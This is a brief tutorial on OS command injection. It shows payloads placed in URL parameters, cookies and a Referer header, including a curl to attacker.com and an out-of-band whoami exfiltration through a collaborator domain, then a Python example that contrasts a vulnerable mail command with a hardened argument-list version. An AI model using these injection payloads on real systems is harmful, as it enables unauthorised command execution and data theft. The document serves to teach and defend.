Command Injections

Like SQLi, command injection can occur anywhere: URL parameters, form fields, HTTP headers, cookies, the Referer header, etc.

http://example.com/page.jsp?id=1; ping 10.11.122.34

Set-Cookie: sessionId=123; path=/; domain=example.com; & nslookup yfew.burpcollaborator.net

GET /index.jsp
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64)
Referer: http://example.com/page.jsp?id=1; curl http://attacker.com

It can also exist in features such as submit feedback, subscribe to newsletter, contact us, etc., for example when the backend sends the mail with a command like:

mail -s "user feedback" -a From:user@example.com

Injecting & ping -c5 127.0.0.1 & causes a delay of 5 seconds, so the injection can also be identified from the response time.

& nslookup `whoami`.burpcollaborator.net
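
The feedback-form case above, as an added example (not code from the original page): a Python handler that builds the page's mail command by string formatting, how a shell splits the result when the sender field carries the & ping -c5 127.0.0.1 & value, and the same handler rebuilt with an allow-list check and an argument list. The function names, the recipient address and the e-mail pattern are assumptions.

```python
import re
import shlex
import subprocess

# Assumed for this example: recipient address and a deliberately strict e-mail pattern.
RECIPIENT = "feedback@example.com"
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
SEPARATORS = {"&", "&&", ";", "|", "||"}  # operators that end one shell command


def vulnerable_command(sender: str) -> str:
    """Before: the sender field is pasted into a string meant for `sh -c`."""
    return f'mail -s "user feedback" -a From:{sender} {RECIPIENT}'


def shell_view(command: str) -> list:
    """Approximate how a POSIX shell splits `command` into separate commands."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            commands.append(current)
            current = []
        else:
            current.append(token)
    commands.append(current)
    return [c for c in commands if c]


def safe_argv(sender: str) -> list:
    """After: allow-list the value, then build an argv list that needs no shell."""
    if not EMAIL_RE.fullmatch(sender):
        raise ValueError("sender is not a plain e-mail address")
    return ["mail", "-s", "user feedback", "-a", f"From:{sender}", RECIPIENT]


def send_feedback(sender: str, body: str) -> None:
    """Run mail directly; the sender stays one argument whatever it contains."""
    subprocess.run(safe_argv(sender), input=body.encode(), check=True)


if __name__ == "__main__":
    injected = "user@example.com & ping -c5 127.0.0.1 &"  # value from the page
    for argv in shell_view(vulnerable_command(injected)):
        print("shell would run:", argv)
    try:
        safe_argv(injected)
    except ValueError as exc:
        print("hardened handler:", exc)
```

shell_view only approximates shell parsing and does not model backtick or $() substitution; the allow-list in safe_argv rejects those characters as well.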
